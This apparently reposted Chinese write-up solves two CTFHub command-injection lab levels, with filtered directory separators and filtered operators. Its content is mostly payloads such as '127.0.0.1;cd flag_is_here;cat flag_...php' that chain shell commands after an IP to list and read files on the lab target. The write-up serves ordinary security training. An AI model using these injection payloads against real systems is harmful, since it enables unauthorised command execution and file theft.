碼上快樂

相關內容    簡體    繁體

ctfhub技能樹—RCE—過濾目錄分隔符,過濾運算符

本文轉載自   查看原文   2020-03-18 11:29   1606    CTF

過濾目錄分隔符

打開靶機

查看頁面信息

查詢當前目錄下文件結構

進入flag_is_here目錄

127.0.0.1;cd flag_is_here
127.0.0.1||ls

執行之后發現還是在當前目錄

使用如下命令進行查詢

127.0.0.1;cd flag_is_here;ls

查看文件信息

127.0.0.1;cd flag_is_here;cat flag_1633660217512.php


成功拿到flag

過濾運算符

查看文件結構

;ls

查看文件信息

;cat flag_46031110028241.php


成功拿到flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CTFHub題解-技能樹-Web-RCE【過濾目錄分隔符、過濾運算符、綜合過濾練習】(二) ctfhub技能樹—RCE—過濾空格 ctfhub技能樹—RCE—綜合過濾練習 ctfhub技能樹—RCE—過濾cat CTFHub web技能樹之RCE初步 命令注入+過濾cat CTFHub題解-技能樹-Web-RCE【命令注入、過濾cat、過濾空格】(一) ctfhub技能樹—sql注入—過濾空格 CTFHub web技能樹 RCE awk 分隔符 CTFHub題解-技能樹-Web-SQL注入(過濾空格)【四】
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM